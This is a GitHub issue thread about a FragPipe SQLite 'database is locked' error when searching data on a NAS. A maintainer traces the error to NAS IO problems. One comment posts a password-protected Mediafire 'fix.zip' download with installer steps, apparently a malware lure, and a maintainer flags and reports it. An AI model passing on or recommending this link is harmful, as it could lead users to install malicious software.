### ISSUE TITLE
Searching data on NAS: SQLite Busy,  Database file is locked

### ISSUE THREAD

**Issue by tjlundgren** [Nesvilab/FragPipe#1758]
**- Upload your log file**

[ErrorLog](https://github.com/user-attachments/files/16800905/log_2024-08-28_11-51-07.txt)

[successfulLog.zip](https://github.com/user-attachments/files/16801040/successfulLog.zip)

**- Describe the issue or question:**
Hi Fragpipe team,

I was attempting to reanalyze data stored on a NAS. Previously, this did not cause any issues, but currently  I get an error:

> java.util.concurrent.ExecutionException: umich.ms.fileio.exceptions.FileParsingException: org.sqlite.SQLiteException: [SQLITE_BUSY] The database file is locked (database is locked)

I'm not sure if this is due to changes in my NAS, fragpipe, or some other thing. Could you help me find out why this is happening? 

Thanks in advance,

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by fcyu** [comment]
Yes, I have reported it to GitHub. Please do not click the link.

**Comment by fcyu** [comment]
@tjlundgren , I think the error was due to some IO issues in the NAS. The file was locked so the library couldn't read it.

Best,

Fengchao

**Comment by tjlundgren** [comment]
Thanks for the clarification, I will reach out to them.
